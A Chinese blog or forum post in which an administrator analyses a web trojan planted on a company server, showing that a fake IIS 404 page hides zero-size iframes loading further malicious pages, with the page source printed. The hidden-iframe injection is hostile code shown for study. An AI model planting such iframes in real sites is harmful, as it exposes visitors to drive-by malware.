 |
Web木马样本获取的简单流程
上午公司服务器也被挂马了,分析了下,顺便将步骤写出来了!共享之,没什么技术含量了,高手可以跳过了! |
就昨天晚上发现木马做了一个简单的分析,木马路径是  http://www.****.com/ma/web.htm 想办法获取其源码,最好不要用IE浏览器,我是用firefox浏览的,但是看到的是一个404的页码: 如下: 引用: 法找到该页 您正在搜索的页面可能已经删除、更名或暂时不可用。 请尝试以下操作: * 确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。 * 如果通过单击链接而到达了该网页,请与网站管理员联系,通知他们该链接的格式不正确。 * 单击后退按钮尝试另一个链接。 HTTP 错误 404 - 文件或目录未找到。 Internet 信息服务 (IIS) 技术信息(为技术支持人员提供) * 转到 Microsoft 产品支持服务并搜索包括“HTTP”和“404”的标题。 * 打开“IIS 帮助”(可在 IIS 管理器 (inetmgr) 中访问),然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。 不要被骗了,查看下其源码: 复制内容到剪贴板代码: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>无法找到该页</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312"> <STYLE type="text/css"> BODY { font: 9pt/12pt 宋体 } H1 { font: 12pt/15pt 宋体 } H2 { font: 9pt/12pt 宋体 } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD> <iframe src="vip1.htm" width="0" height="0" border="0"></iframe> <iframe src="vip2.htm" width="0" height="0" border="0"></iframe> <iframe src="vip3.htm" width="0" height="0" border="0"></iframe> <iframe src="vip4.htm" width="0" height="0" border="0"></iframe> <iframe src="vip5.html" width="0" height="0" border="0"></iframe> <iframe src="vip6.htm" width="0" height="0" border="0"></iframe> <iframe src="vip7.htm" width="0" height="0" border="0"></iframe> <iframe src="vip.htm" width="50" height="0" border="0"></iframe> <h1>无法找到该页</h1> 您正在搜索的页面可能已经删除、更名或暂时不可用。 <hr> <p>请尝试以下操作:</p> <ul> <li>确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。</li> <li>如果通过单击链接而到达了该网页,请与网站管理员联系,通知他们该链接的格式不正确。 </li> <li>单击<a href="javascript:history.back(1)">后退</a>按钮尝试另一个链接。</li> </ul> <h2>HTTP 错误 404 - 文件或目录未找到。<br>Internet 信息服务 (IIS)</h2> <hr> <p>技术信息(为技术支持人员提供)</p> <ul> <li>转到 <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft 产品支持服务</a>并搜索包括“HTTP”和“404”的标题。</li> <li>打开“IIS 帮助”(可在 IIS 管理器 (inetmgr) 中访问),然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。</li> </ul> </TD></TR></TABLE></BODY></HTML> 看到里面的框架了吧: 复制内容到剪贴板代码: <iframe src="vip1.htm" width="0" height="0" border="0"></iframe> <iframe src="vip2.htm" width="0" height="0" border="0"></iframe> <iframe src="vip3.htm" width="0" height="0" border="0"></iframe> <iframe src="vip4.htm" width="0" height="0" border="0"></iframe> <iframe src="vip5.html" width="0" height="0" border="0"></iframe> <iframe src="vip6.htm" width="0" height="0" border="0"></iframe> <iframe src="vip7.htm" width="0" height="0" border="0"></iframe> <iframe src="vip.htm" width="50" height="0" border="0"></iframe> |
相关黑客文章
- 2008-09-16[黑客编程] Linux操作系统Shell基础知识
- 2008-09-16[黑客编程] Shell基础学习:关于Wget命令的..
- 2008-09-16[本地提权] linux下留本地后门的两个方法
- 2008-09-16[工具使用] Linux压缩打包命令使用方法
- 2008-09-15[黑客编程] 新手入门——shell入门
- 2008-09-15[黑客编程] Unix和Linux下C语言学习指南
- 2008-09-15[工具使用] Linux 指令篇:使用者管理--su
- 2008-09-15[工具使用] 3389的SHIFT后门自动扫描
- 2008-09-14[本地提权] 一个linux提权用的技巧
- 2008-09-14[黑客编程] 从脚本编写到面向对象的 Pytho..
